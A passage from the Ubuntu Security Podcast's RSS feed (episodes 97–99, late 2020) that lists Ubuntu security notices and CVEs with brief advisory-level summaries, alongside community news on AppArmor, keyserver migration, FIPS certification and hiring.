<li><a href="https://ubuntu.com/security/CVE-2020-28948">CVE-2020-28948</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4655-1-werkzeug-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4655-1">USN-4655-1</a>] Werkzeug vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-28724">CVE-2020-28724</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14806">CVE-2019-14806</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4656-1-x-dot-org-x-server-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4656-1">USN-4656-1</a>] X.Org X Server vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25712">CVE-2020-25712</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14360">CVE-2020-14360</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4657-1-linux-kernel-vulnerabilities-09-11">[<a href="https://ubuntu.com/security/notices/USN-4657-1">USN-4657-1</a>] Linux kernel vulnerabilities [09:11]</h3>
<ul>
<li>12 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-4788">CVE-2020-4788</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28915">CVE-2020-28915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25705">CVE-2020-25705</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25645">CVE-2020-25645</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25643">CVE-2020-25643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25284">CVE-2020-25284</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25211">CVE-2020-25211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14390">CVE-2020-14390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14351">CVE-2020-14351</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12352">CVE-2020-12352</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10135">CVE-2020-10135</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0427">CVE-2020-0427</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Most interesting is Power 9 processers could end up exposing information
via L1 cache -&gt; spectre-like attack could allow this to be read - fix is
similar to spectre etc - flush L1 cache when transitioning between
privilege boundaries</li>
<li>Thanks to Daniel Axtens from IBM for doing a lot of the heavy lifting,
working with the kernel team to provide backports etc</li>
</ul>
<h3 id="usn-4658-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4658-1">USN-4658-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-4788">CVE-2020-4788</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28915">CVE-2020-28915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25705">CVE-2020-25705</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25645">CVE-2020-25645</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25643">CVE-2020-25643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25284">CVE-2020-25284</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25211">CVE-2020-25211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14390">CVE-2020-14390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14351">CVE-2020-14351</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10135">CVE-2020-10135</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0423">CVE-2020-0423</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4659-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4659-1">USN-4659-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-4788">CVE-2020-4788</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28915">CVE-2020-28915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27152">CVE-2020-27152</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25705">CVE-2020-25705</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14351">CVE-2020-14351</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10135">CVE-2020-10135</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0423">CVE-2020-0423</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="github-state-of-open-source-security-report-2020-10-43">GitHub state of open source security report 2020 [10:43]</h3>
<ul>
<li><a href="https://octoverse.github.com/static/2020-security-report.pdf">https://octoverse.github.com/static/2020-security-report.pdf</a></li>
<li>Scanned packages in Composer (PHP), Maven (Java), npm (JS), NuGet (.NET),
PyPI and RubyGems</li>
<li>Found 94% of projects on GitHub relied on open source components - JS
packages have a median of nearly 700 transitive dependencies - cf Python
with 19</li>
<li>17% of advisories sampled related to explicitly malicious behaviour
(almost all in npm packages) - but most are just mistakes</li>
<li>Vulns go undetected for just over 4 years (218 weeks) before disclosure,
fixes though then come quick in ~4.4 weeks and then 10 weeks to alert
users of the fix</li>
<li>A line of code written today is just as likely to contain a vulnerability
today as 4 years ago - so we are not getting more secure over time</li>
</ul>
<h3 id="migrating-launchpad-pgp-keyservers-from-sks-to-hockeypuck-15-03">Migrating Launchpad PGP keyservers from SKS to Hockeypuck [15:03]</h3>
<ul>
<li><a href="https://ubuntu.com/blog/migrating-the-launchpad-keyservers-from-sks-to-hockeypuck">https://ubuntu.com/blog/migrating-the-launchpad-keyservers-from-sks-to-hockeypuck</a></li>
</ul>
<h3 id="apparmor-3-dot-0-dot-1-released-16-27">AppArmor 3.0.1 Released [16:27]</h3>
<ul>
<li><a href="https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_3.0.1">https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_3.0.1</a></li>
<li>cap checkpoint_restore for 5.9 kernels onwards plus bug fixes etc</li>
</ul>
<h3 id="hiring-16-52">Hiring [16:52]</h3>
<h4 id="apparmor-security-engineer">AppArmor Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2114847">https://canonical.com/careers/2114847</a></li>
</ul>
<h4 id="engineering-director-ubuntu-security">Engineering Director - Ubuntu Security</h4>
<ul>
<li><a href="https://canonical.com/careers/2439068">https://canonical.com/careers/2439068</a></li>
</ul>
<h4 id="engineering-manager-ubuntu-security">Engineering Manager - Ubuntu Security</h4>
<ul>
<li><a href="https://canonical.com/careers/2439058">https://canonical.com/careers/2439058</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E099.mp3" length="14174734" type="audio/mpeg" /><itunes:duration>18:35</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 98
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-98/</link>
          <pubDate>Fri, 27 Nov 2020 14:38:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>b32306fb10d48096b169a5c6028fa268fcd387cf25b313a5c432c81af177578328433c2e1957ab36f179ffe046bb44689b85baa40afbab5c942949f2cd6d492d</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 98</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at updates for c-ares, PulseAudio, phpMyAdmin and more,
  plus we cover security news from the Ubuntu community including planning
  for 16.04 LTS to transition to ESM, libgcrypt FIPS cerified for 18.04 LTS
  and a proposal...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at updates for c-ares, PulseAudio, phpMyAdmin and more,
  plus we cover security news from the Ubuntu community including planning
  for 16.04 LTS to transition to ESM, libgcrypt FIPS cerified for 18.04 LTS
  and a proposal for making home directories more secure for upcoming Ubuntu
  releases as well.
  </itunes:summary>
        <description>  This week we look at updates for c-ares, PulseAudio, phpMyAdmin and more,
  plus we cover security news from the Ubuntu community including planning
  for 16.04 LTS to transition to ESM, libgcrypt FIPS cerified for 18.04 LTS
  and a proposal for making home directories more secure for upcoming Ubuntu
  releases as well.
  </description>
        <googleplay:description>  This week we look at updates for c-ares, PulseAudio, phpMyAdmin and more,
  plus we cover security news from the Ubuntu community including planning
  for 16.04 LTS to transition to ESM, libgcrypt FIPS cerified for 18.04 LTS
  and a proposal for making home directories more secure for upcoming Ubuntu
  releases as well.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at updates for c-ares, PulseAudio, phpMyAdmin and more,
plus we cover security news from the Ubuntu community including planning
for 16.04 LTS to transition to ESM, libgcrypt FIPS cerified for 18.04 LTS
and a proposal for making home directories more secure for upcoming Ubuntu
releases as well.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>48 unique CVEs addressed</p>
<h3 id="usn-4638-1-c-ares-vulnerability-01-00">[<a href="https://ubuntu.com/security/notices/USN-4638-1">USN-4638-1</a>] c-ares vulnerability [01:00]</h3>
<ul>
<li>1 CVEs addressed in Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8277">CVE-2020-8277</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>C library for performing async DNS requests and name resolution - a fork
of the ares library with additional support for IPv6, and 64-bit/cross
platform support</li>
<li>In particular is used by Node.js for DNS support - reported as a DoS via
a remote attacker who could cause a Node.js application to perform a DNS
request to a chosen host where a large number of DNS records - internally
is a buffer-over-read - c-ares would return data of length N but with a
purported length of &gt;N - only in more recent releases so only affected
groovy</li>
</ul>
<h3 id="usn-4639-1-phpmyadmin-vulnerabilities-02-37">[<a href="https://ubuntu.com/security/notices/USN-4639-1">USN-4639-1</a>] phpMyAdmin vulnerabilities [02:37]</h3>
<ul>
<li>13 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-26935">CVE-2020-26935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26934">CVE-2020-26934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10803">CVE-2020-10803</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10802">CVE-2020-10802</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6799">CVE-2019-6799</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-5504">CVE-2020-5504</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10804">CVE-2020-10804</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6798">CVE-2019-6798</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12616">CVE-2019-12616</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11768">CVE-2019-11768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7260">CVE-2018-7260</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19970">CVE-2018-19970</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19968">CVE-2018-19968</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various issues - multiple different instances of each of the following:
XSS, SQL injection, CSRF, sensitive info leaks etc</li>
</ul>
<h3 id="usn-4637-2-firefox-vulnerabilities-03-08">[<a href="https://ubuntu.com/security/notices/USN-4637-2">USN-4637-2</a>] Firefox vulnerabilities [03:08]</h3>
<ul>
<li>15 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-26969">CVE-2020-26969</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26968">CVE-2020-26968</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26967">CVE-2020-26967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26965">CVE-2020-26965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26963">CVE-2020-26963</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26962">CVE-2020-26962</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26961">CVE-2020-26961</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26960">CVE-2020-26960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26959">CVE-2020-26959</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26958">CVE-2020-26958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26956">CVE-2020-26956</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26953">CVE-2020-26953</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26952">CVE-2020-26952</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26951">CVE-2020-26951</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16012">CVE-2020-16012</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-97/">Episode 97</a></li>
<li>Xenial takes longer usually due to toolchain issues between old versions
in xenial vs newer things used in Firefox (ie rust etc)</li>
</ul>
<h3 id="usn-4634-2-openldap-vulnerabilities-03-57">[<a href="https://ubuntu.com/security/notices/USN-4634-2">USN-4634-2</a>] OpenLDAP vulnerabilities [03:57]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25710">CVE-2020-25710</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25709">CVE-2020-25709</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-97/">Episode 97</a> - 2 DoS issues</li>
</ul>
<h3 id="usn-4640-1-pulseaudio-vulnerability-04-13">[<a href="https://ubuntu.com/security/notices/USN-4640-1">USN-4640-1</a>] PulseAudio vulnerability [04:13]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-16123">CVE-2020-16123</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Discovered and resolved by James Henstridge from the Ubuntu Desktop Team</li>
<li>Race condition in snap policy module could allow a confined snap to
bypass snap pulseaudio restrictions - ie. could record audio when only
authorised to playback audio</li>
<li><a href="https://twitter.com/JamesHenstridge/status/1331161130740248580">https://twitter.com/JamesHenstridge/status/1331161130740248580</a></li>
</ul>
<h3 id="usn-4641-1-libextractor-vulnerabilities-06-20">[<a href="https://ubuntu.com/security/notices/USN-4641-1">USN-4641-1</a>] libextractor vulnerabilities [06:20]</h3>
<ul>
<li>12 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-20431">CVE-2018-20431</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14347">CVE-2018-14347</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14346">CVE-2018-14346</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17440">CVE-2017-17440</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15922">CVE-2017-15922</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15602">CVE-2017-15602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15601">CVE-2017-15601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20430">CVE-2018-20430</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16430">CVE-2018-16430</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15600">CVE-2017-15600</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15267">CVE-2017-15267</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15266">CVE-2017-15266</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Used to extract metadata from various file formats (HTML, PS, MS Office,
audio, images, video, archives, packages etc)</li>
<li>NULL ptr deref, divide by zero, OOB read, infinite loop, stack buffer
overflows, heap buffer overflows etc</li>
</ul>
<h3 id="usn-4642-1-pdfresurrect-vulnerability-07-28">[<a href="https://ubuntu.com/security/notices/USN-4642-1">USN-4642-1</a>] PDFResurrect vulnerability [07:28]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-9549">CVE-2020-9549</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Extract / manipulate revision info in PDFs</li>
<li>OOB write</li>
</ul>
<h3 id="usn-4643-1-atftp-vulnerabilities-07-56">[<a href="https://ubuntu.com/security/notices/USN-4643-1">USN-4643-1</a>] atftp vulnerabilities [07:56]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11366">CVE-2019-11366</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11365">CVE-2019-11365</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>TFTP server / client</li>
<li>NULL ptr deref due to race condition from missing mutex lock - different
threads can race on the same data -&gt; DoS</li>
<li>stack buffer overflow due to unsafe calls to strncpy -&gt; DoS / RCE</li>
</ul>
<h3 id="usn-4644-1-igraph-vulnerability-08-35">[<a href="https://ubuntu.com/security/notices/USN-4644-1">USN-4644-1</a>] igraph vulnerability [08:35]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-20349">CVE-2018-20349</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NULL ptr deref</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-16-dot-04-lts-moving-to-esm-webinar-08-52">Ubuntu 16.04 LTS moving to ESM webinar [08:52]</h3>
<ul>
<li><a href="https://www.brighttalk.com/webcast/6793/453617">https://www.brighttalk.com/webcast/6793/453617</a></li>
<li>8th December 2020, 4pm UTC</li>
</ul>
<h3 id="security-certifications-libgcrypt-on-ubuntu-18-dot-04-is-fips-140-2-certified-10-13">Security Certifications - libgcrypt on Ubuntu 18.04 is FIPS 140-2 certified [10:13]</h3>
<ul>
<li><a href="https://discourse.ubuntu.com/t/security-certifications-libgcrypt-on-ubuntu-18-04-is-fips-140-2-certified/19511">https://discourse.ubuntu.com/t/security-certifications-libgcrypt-on-ubuntu-18-04-is-fips-140-2-certified/19511</a></li>
<li>Ubuntu 18.04 LTS can now provide FIPS certified full disk encryption as via libgcrypt which is now FIPS certified</li>
<li>Certified for 5 years until 2025</li>
</ul>
<h3 id="private-home-directories-for-ubuntu-21-dot-04-onwards-10-45">Private home directories for Ubuntu 21.04 onwards? [10:45]</h3>
<ul>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-devel-discuss/2020-November/018842.html">https://lists.ubuntu.com/archives/ubuntu-devel-discuss/2020-November/018842.html</a></li>
<li><a href="https://discourse.ubuntu.com/t/private-home-directories-for-ubuntu-21-04-onwards/19533">https://discourse.ubuntu.com/t/private-home-directories-for-ubuntu-21-04-onwards/19533</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E098.mp3" length="10758946" type="audio/mpeg" /><itunes:duration>13:54</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 97
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-97/</link>
          <pubDate>Sat, 21 Nov 2020 12:13:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>ef6d6a059883f9765e613e8aa454bd5672bcfb21bf7fc21d5b79d351f9580ef5236f6a56edd28508844570088da6ae46cc5fc38fb77b2e2b8399a890def30176</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 97</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at vulnerabilities in MoinMoin, OpenLDAP, Kerberos,
  Raptor (including a discussion of CVE workflows and the oss-security
  mailing list) and more, whilst in community news we talk about the upcoming
  AppArmor webinar,...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at vulnerabilities in MoinMoin, OpenLDAP, Kerberos,
  Raptor (including a discussion of CVE workflows and the oss-security
  mailing list) and more, whilst in community news we talk about the upcoming
  AppArmor webinar, migration of Ubuntu CVE information to ubuntu.com and
  reverse engineering of malware by the Canonical Sustaining Engineering
  team.
  </itunes:summary>
        <description>  This week we look at vulnerabilities in MoinMoin, OpenLDAP, Kerberos,
  Raptor (including a discussion of CVE workflows and the oss-security
  mailing list) and more, whilst in community news we talk about the upcoming
  AppArmor webinar, migration of Ubuntu CVE information to ubuntu.com and
  reverse engineering of malware by the Canonical Sustaining Engineering
  team.
  </description>
        <googleplay:description>  This week we look at vulnerabilities in MoinMoin, OpenLDAP, Kerberos,
  Raptor (including a discussion of CVE workflows and the oss-security
  mailing list) and more, whilst in community news we talk about the upcoming
  AppArmor webinar, migration of Ubuntu CVE information to ubuntu.com and
  reverse engineering of malware by the Canonical Sustaining Engineering
  team.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at vulnerabilities in MoinMoin, OpenLDAP, Kerberos,
Raptor (including a discussion of CVE workflows and the oss-security
mailing list) and more, whilst in community news we talk about the upcoming
AppArmor webinar, migration of Ubuntu CVE information to ubuntu.com and
reverse engineering of malware by the Canonical Sustaining Engineering
team.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>45 unique CVEs addressed</p>
<h3 id="usn-4629-1-moinmoin-vulnerabilities-00-50">[<a href="https://ubuntu.com/security/notices/USN-4629-1">USN-4629-1</a>] MoinMoin vulnerabilities [00:50]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15275">CVE-2020-15275</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25074">CVE-2020-25074</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>RCE via attachment upload - can upload an attachment which is then
cached - a subsequent crafted request can exploit a vulnerability in the
cache handling code to achieve directory traversal and a subsequent RCE</li>
</ul>
<h3 id="usn-4630-1-raptor-vulnerability-01-40">[<a href="https://ubuntu.com/security/notices/USN-4630-1">USN-4630-1</a>] Raptor vulnerability [01:40]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-18926">CVE-2017-18926</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://www.openwall.com/lists/oss-security/2017/06/07/1">https://www.openwall.com/lists/oss-security/2017/06/07/1</a></li>
<li>Old vulnerability, recently rediscovered that triggered various
discussions on oss-security mailing list
<ul>
<li><a href="https://www.openwall.com/lists/oss-security/2020/11/13/1">https://www.openwall.com/lists/oss-security/2020/11/13/1</a></li>
<li>Discussion covered value of CVEs, how distros try and stay on top of
the constant stream of CVEs etc</li>
</ul>
</li>
<li>Shows the value of a CVE - many distros use these as essentially work
items - if a CVE doesn&rsquo;t exist, the vulnerability won&rsquo;t get patched</li>
</ul>
<h3 id="usn-4622-2-openldap-vulnerability-03-43">[<a href="https://ubuntu.com/security/notices/USN-4622-2">USN-4622-2</a>] OpenLDAP vulnerability [03:43]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25692">CVE-2020-25692</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-96/">Episode 96</a> - NULL ptr deref for a remote unauthenticated user in slapd</li>
<li>Upstream dispute this as a real CVE - say that only unintended info
disclosure is a security issue (what about RCE?)</li>
</ul>
<h3 id="usn-4628-2-intel-microcode-regression-04-29">[<a href="https://ubuntu.com/security/notices/USN-4628-2">USN-4628-2</a>] Intel Microcode regression [04:29]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8698">CVE-2020-8698</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8696">CVE-2020-8696</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8695">CVE-2020-8695</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-96/">Episode 96</a> - Failed to boot on new Tiger Lake platforms</li>
<li>We took the decision to remove this MCU once we saw the regression and
had updates out within 24h of initial release</li>
<li>Intel have now reverted this themselves upstream in a <a href="https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files/tree/microcode-20201118">fixup release
20201118</a></li>
</ul>
<h3 id="usn-4171-6-apport-regression-05-40">[<a href="https://ubuntu.com/security/notices/USN-4171-6">USN-4171-6</a>] Apport regression [05:40]</h3>
<ul>
<li>5 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15790">CVE-2019-15790</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11485">CVE-2019-11485</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11483">CVE-2019-11483</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11482">CVE-2019-11482</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11481">CVE-2019-11481</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Previous update could possibly be used to crash Apport itself due to
mishandling of dropping permissions when reading the user&rsquo;s config file
